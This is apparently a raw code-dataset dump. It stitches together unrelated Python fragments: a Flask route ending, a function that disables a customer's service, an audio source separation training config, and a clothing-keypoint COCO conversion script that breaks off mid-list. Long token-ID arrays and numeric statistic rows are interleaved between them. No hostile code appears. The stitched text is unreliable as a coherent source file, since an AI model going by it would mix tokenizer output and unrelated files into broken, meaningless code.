796,
46947,
7,
834,
3672,
834,
8,
628,
198,
31,
1324,
13,
38629,
7203,
14,
7220,
1600,
5050,
28,
17816,
18851,
6,
12962,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
598,
13,
5143,
7,
634,
28,
6200,
17,
11,
14257,
28,
17821,
8,
198
] | 2.569444 | 72 |
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.rpc import arguments, returns
from rogerthat.bizz.profile import set_service_disabled as rogerthat_set_service_disabled, \
set_service_enabled as rogerthat_re_enable_service
from rogerthat.rpc import users
from rogerthat.rpc.service import BusinessException
from rogerthat.utils import now
from shop.models import Customer
from solutions.common.dal import get_solution_settings
@returns()
@arguments(customer_or_id=(int, long, Customer), disabled_reason_int=(int, long))
def set_service_disabled(customer_or_id, disabled_reason_int):
"""
Disables the customer his service, disconnects all users and sets the service invisible.
Args:
customer_or_id (int, long, Customer): customer or id
disabled_reason_int (int, long): reason why the service has been disabled
Raises:
NoSubscriptionException
BusinessException
"""
if isinstance(customer_or_id, Customer):
customer = customer_or_id
else:
customer = Customer.get_by_id(customer_or_id)
if not customer.service_email:
raise BusinessException('Customer %d has no service email' % customer.id)
if disabled_reason_int not in Customer.DISABLED_REASONS:
raise BusinessException('Invalid disable service reason')
service_user = users.User(customer.service_email)
sln_settings = get_solution_settings(service_user)
customer.service_disabled_at = now()
customer.disabled_reason_int = disabled_reason_int
sln_settings.search_enabled = False
sln_settings.service_disabled = True
db.put([customer, sln_settings])
rogerthat_set_service_disabled(service_user)
@returns()
@arguments(customer_id=int)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
15069,
12131,
3469,
6916,
15664,
23973,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
7330,
257,
4866,
286,
262,
13789,
379,
198,
2,
198,
2,
220,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
2,
198,
2,
17486,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
2,
9387,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
198,
2,
42881,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
198,
2,
4091,
262,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
198,
2,
11247,
739,
262,
13789,
13,
198,
2,
198,
2,
25248,
43085,
62,
9641,
25,
16,
13,
22,
12404,
198,
198,
6738,
23645,
13,
1324,
18392,
13,
2302,
1330,
20613,
198,
198,
6738,
285,
12993,
86,
13,
81,
14751,
1330,
7159,
11,
5860,
198,
6738,
686,
1362,
5562,
13,
65,
6457,
13,
13317,
1330,
900,
62,
15271,
62,
47730,
355,
686,
1362,
5562,
62,
2617,
62,
15271,
62,
47730,
11,
3467,
198,
220,
220,
220,
900,
62,
15271,
62,
25616,
355,
686,
1362,
5562,
62,
260,
62,
21633,
62,
15271,
198,
6738,
686,
1362,
5562,
13,
81,
14751,
1330,
2985,
198,
6738,
686,
1362,
5562,
13,
81,
14751,
13,
15271,
1330,
7320,
16922,
198,
6738,
686,
1362,
5562,
13,
26791,
1330,
783,
198,
6738,
6128,
13,
27530,
1330,
22092,
198,
6738,
8136,
13,
11321,
13,
31748,
1330,
651,
62,
82,
2122,
62,
33692,
628,
198,
31,
7783,
82,
3419,
198,
31,
853,
2886,
7,
23144,
263,
62,
273,
62,
312,
16193,
600,
11,
890,
11,
22092,
828,
10058,
62,
41181,
62,
600,
16193,
600,
11,
890,
4008,
198,
4299,
900,
62,
15271,
62,
47730,
7,
23144,
263,
62,
273,
62,
312,
11,
10058,
62,
41181,
62,
600,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
3167,
2977,
262,
6491,
465,
2139,
11,
22837,
82,
477,
2985,
290,
5621,
262,
2139,
14836,
13,
628,
220,
220,
220,
943,
14542,
25,
198,
220,
220,
220,
220,
220,
220,
220,
6491,
62,
273,
62,
312,
357,
600,
11,
890,
11,
22092,
2599,
6491,
393,
4686,
198,
220,
220,
220,
220,
220,
220,
220,
10058,
62,
41181,
62,
600,
357,
600,
11,
890,
2599,
1738,
1521,
262,
2139,
468,
587,
10058,
628,
220,
220,
220,
7567,
2696,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1400,
7004,
33584,
16922,
198,
220,
220,
220,
220,
220,
220,
220,
7320,
16922,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
611,
318,
39098,
7,
23144,
263,
62,
273,
62,
312,
11,
22092,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
6491,
796,
6491,
62,
273,
62,
312,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
6491,
796,
22092,
13,
1136,
62,
1525,
62,
312,
7,
23144,
263,
62,
273,
62,
312,
8,
628,
220,
220,
220,
611,
407,
6491,
13,
15271,
62,
12888,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
7320,
16922,
10786,
44939,
4064,
67,
468,
645,
2139,
3053,
6,
4064,
6491,
13,
312,
8,
198,
220,
220,
220,
611,
10058,
62,
41181,
62,
600,
407,
287,
22092,
13,
26288,
6242,
30465,
62,
2200,
1921,
19213,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
7320,
16922,
10786,
44651,
15560,
2139,
1738,
11537,
628,
220,
220,
220,
2139,
62,
7220,
796,
2985,
13,
12982,
7,
23144,
263,
13,
15271,
62,
12888,
8,
198,
220,
220,
220,
1017,
77,
62,
33692,
796,
651,
62,
82,
2122,
62,
33692,
7,
15271,
62,
7220,
8,
198,
220,
220,
220,
6491,
13,
15271,
62,
47730,
62,
265,
796,
783,
3419,
198,
220,
220,
220,
6491,
13,
47730,
62,
41181,
62,
600,
796,
10058,
62,
41181,
62,
600,
198,
220,
220,
220,
1017,
77,
62,
33692,
13,
12947,
62,
25616,
796,
10352,
198,
220,
220,
220,
1017,
77,
62,
33692,
13,
15271,
62,
47730,
796,
6407,
198,
220,
220,
220,
20613,
13,
1996,
26933,
23144,
263,
11,
1017,
77,
62,
33692,
12962,
628,
220,
220,
220,
686,
1362,
5562,
62,
2617,
62,
15271,
62,
47730,
7,
15271,
62,
7220,
8,
628,
198,
31,
7783,
82,
3419,
198,
31,
853,
2886,
7,
23144,
263,
62,
312,
28,
600,
8,
198
] | 3.110526 | 760 |
# Ke Chen
# [email protected]
# Zero-shot Audio Source Separation via Query-based Learning from Weakly-labeled Data
# The configuration file
# for model training
exp_name = "exp_zs_asp_full" # the saved ckpt prefix name of the model
workspace = "/home/Research/ZS_ASP/" # the folder of your code
dataset_path = "/home/Research/ZS_ASP/data/audioset" # the dataset path
index_type = "full_train"
idc_path = "/home/Research/ZS_ASP/" # the folder of audioset class count files
balanced_data = True
# trained from a checkpoint, or evaluate a single model
resume_checkpoint = None
# "/home/Research/ZS_ASP/model_backup/zeroshot_asp_full.ckpt"
loss_type = "mae"
gather_mode = False
debug = False
classes_num = 527
eval_list = [] # left blank to preserve all classes, otherwise will filter the specified classes
# [15, 63, 81, 184, 335, 449, 474, 348, 486, 4] # randomly generated from the 527-classes for held-out evaludation
batch_size = 16 * 8 # batch size per GPU x GPU number , default is 16 x 8 = 128
learning_rate = 1e-3 # 3e-4 is also workable
max_epoch = 100
num_workers = 3
lr_scheduler_epoch = [90, 110]
latent_dim = 2048
# for signal processing
sample_rate = 32000
clip_samples = sample_rate * 10 # audio_set 10-sec clip
segment_frames = 200
hop_samples = 320
random_seed = 12412 # 444612 1536123 12412
random_mode = "one_class" # "no_random, one_class, random, order", one class is the best
# for evaluation
musdb_path = "/home/Research/ZS_ASP/data/musdb-wav/" # musdb download folder
testavg_path = "/home/Research/ZS_ASP/data/musdb30-train-32000fs.npy" # the processed training set (to get the latent query)
testset_path = "/home/Research/ZS_ASP/data/musdb-test-32000fs.npy" # the processed testing set (to calculate the performance)
test_key = ["vocals", "drums", "bass", "other"] # four tracks for musdb, and your named track for other inference
test_type = "mix"
infer_type = "mean"
energy_thres = 0.1
wave_output_path = "/home/Research/ZS_ASP/wavoutput" # output folder
using_wiener = True # use wiener filter or not (default: True)
using_whiting = False # use whiting or not (default: False)
# weight average
wa_model_folder = "/home/Research/ZS_ASP/version_3/checkpoints/"
wa_model_path = "zs_wa.ckpt"
# for inference
inference_file = "/home/Research/ZS_ASP/data/pagenini.wav" # an audio file to separate
inference_query = "/home/Research/ZS_ASP/data/query" # a folder containing all samples for obtaining the query
overlap_rate = 0.5 # [0.0, 1.0), 0 to disabled, recommand 0.5 for 50% overlap. Overlap will increase computation time and improve result quality | [
2,
3873,
12555,
198,
2,
638,
315,
6607,
31,
1229,
21282,
13,
15532,
198,
2,
12169,
12,
9442,
13491,
8090,
8621,
10186,
2884,
43301,
12,
3106,
18252,
422,
28788,
306,
12,
18242,
276,
6060,
198,
2,
383,
8398,
2393,
198,
198,
2,
329,
2746,
3047,
198,
11201,
62,
3672,
796,
366,
11201,
62,
89,
82,
62,
5126,
62,
12853,
1,
1303,
262,
7448,
269,
74,
457,
21231,
1438,
286,
262,
2746,
220,
198,
5225,
10223,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
30487,
1303,
262,
9483,
286,
534,
2438,
198,
19608,
292,
316,
62,
6978,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
7890,
14,
3885,
4267,
316,
1,
1303,
262,
27039,
3108,
198,
9630,
62,
4906,
796,
366,
12853,
62,
27432,
1,
198,
312,
66,
62,
6978,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
30487,
1303,
262,
9483,
286,
2709,
4267,
316,
1398,
954,
3696,
198,
27753,
62,
7890,
796,
6407,
198,
198,
2,
8776,
422,
257,
26954,
11,
393,
13446,
257,
2060,
2746,
220,
198,
411,
2454,
62,
9122,
4122,
796,
6045,
198,
2,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
19849,
62,
1891,
929,
14,
9107,
3768,
313,
62,
5126,
62,
12853,
13,
694,
457,
1,
198,
198,
22462,
62,
4906,
796,
366,
2611,
68,
1,
198,
198,
70,
1032,
62,
14171,
796,
10352,
198,
24442,
796,
10352,
198,
198,
37724,
62,
22510,
796,
642,
1983,
198,
18206,
62,
4868,
796,
17635,
1303,
1364,
9178,
284,
12201,
477,
6097,
11,
4306,
481,
8106,
262,
7368,
6097,
198,
2,
685,
1314,
11,
8093,
11,
9773,
11,
28598,
11,
37144,
11,
604,
2920,
11,
604,
4524,
11,
44084,
11,
604,
4521,
11,
604,
60,
1303,
15456,
7560,
422,
262,
642,
1983,
12,
37724,
329,
2714,
12,
448,
5418,
463,
341,
628,
198,
43501,
62,
7857,
796,
1467,
1635,
807,
220,
220,
1303,
15458,
2546,
583,
11362,
2124,
11362,
1271,
837,
4277,
318,
1467,
2124,
807,
796,
13108,
198,
40684,
62,
4873,
796,
352,
68,
12,
18,
1303,
513,
68,
12,
19,
318,
635,
670,
540,
198,
9806,
62,
538,
5374,
796,
1802,
198,
22510,
62,
22896,
796,
513,
198,
14050,
62,
1416,
704,
18173,
62,
538,
5374,
796,
685,
3829,
11,
9796,
60,
198,
15460,
298,
62,
27740,
796,
36117,
198,
198,
2,
329,
6737,
7587,
198,
39873,
62,
4873,
796,
3933,
830,
198,
15036,
62,
82,
12629,
796,
6291,
62,
4873,
1635,
838,
1303,
6597,
62,
2617,
838,
12,
2363,
10651,
198,
325,
5154,
62,
37805,
796,
939,
220,
198,
8548,
62,
82,
12629,
796,
20959,
198,
25120,
62,
28826,
796,
19755,
1065,
1303,
604,
27260,
1065,
1315,
2623,
10163,
19755,
1065,
198,
25120,
62,
14171,
796,
366,
505,
62,
4871,
1,
1303,
366,
3919,
62,
25120,
11,
530,
62,
4871,
11,
4738,
11,
1502,
1600,
530,
1398,
318,
262,
1266,
198,
198,
2,
329,
12660,
198,
14664,
9945,
62,
6978,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
7890,
14,
14664,
9945,
12,
45137,
30487,
1303,
1928,
9945,
4321,
9483,
198,
9288,
615,
70,
62,
6978,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
7890,
14,
14664,
9945,
1270,
12,
27432,
12,
2624,
830,
9501,
13,
77,
9078,
1,
1303,
262,
13686,
3047,
900,
357,
1462,
651,
262,
41270,
12405,
8,
198,
9288,
2617,
62,
6978,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
7890,
14,
14664,
9945,
12,
9288,
12,
2624,
830,
9501,
13,
77,
9078,
1,
1303,
262,
13686,
4856,
900,
357,
1462,
15284,
262,
2854,
8,
198,
9288,
62,
2539,
796,
14631,
18893,
874,
1600,
366,
7109,
5700,
1600,
366,
42933,
1600,
366,
847,
8973,
1303,
1440,
8339,
329,
1928,
9945,
11,
290,
534,
3706,
2610,
329,
584,
32278,
198,
9288,
62,
4906,
796,
366,
19816,
1,
198,
259,
2232,
62,
4906,
796,
366,
32604,
1,
198,
22554,
62,
400,
411,
796,
657,
13,
16,
198,
19204,
62,
22915,
62,
6978,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
45137,
22915,
1,
1303,
5072,
9483,
198,
3500,
62,
37686,
877,
796,
6407,
1303,
779,
45967,
877,
8106,
393,
407,
357,
12286,
25,
6407,
8,
198,
3500,
62,
1929,
1780,
796,
10352,
1303,
779,
348,
1780,
393,
407,
357,
12286,
25,
10352,
8,
198,
198,
2,
3463,
2811,
198,
10247,
62,
19849,
62,
43551,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
9641,
62,
18,
14,
9122,
13033,
30487,
198,
10247,
62,
19849,
62,
6978,
796,
366,
89,
82,
62,
10247,
13,
694,
457,
1,
198,
198,
2,
329,
32278,
198,
259,
4288,
62,
7753,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
7890,
14,
79,
11286,
5362,
13,
45137,
1,
1303,
281,
6597,
2393,
284,
4553,
198,
259,
4288,
62,
22766,
796,
12813,
11195,
14,
25104,
14,
57,
50,
62,
1921,
47,
14,
7890,
14,
22766,
1,
1303,
257,
9483,
7268,
477,
8405,
329,
16727,
262,
12405,
198,
2502,
37796,
62,
4873,
796,
657,
13,
20,
1303,
685,
15,
13,
15,
11,
352,
13,
15,
828,
657,
284,
10058,
11,
3045,
392,
657,
13,
20,
329,
2026,
4,
21721,
13,
3827,
37796,
481,
2620,
29964,
640,
290,
2987,
1255,
3081
] | 2.955479 | 876 |
import json
from PIL import Image
import numpy as np
import shutil
import os
import random
dataset = {
"info": {},
"licenses": [],
"images": [],
"annotations": [],
"annotations2": [],
"categories": [],
"categories2": []
}
dataset['categories'].append({
'id': 1,
'name': "short_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 2,
'name': "long_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 3,
'name': "short_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 4,
'name': "long_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 5,
'name': "vest",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 6,
'name': "sling",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 7,
'name': "shorts",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 8,
'name': "trousers",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', 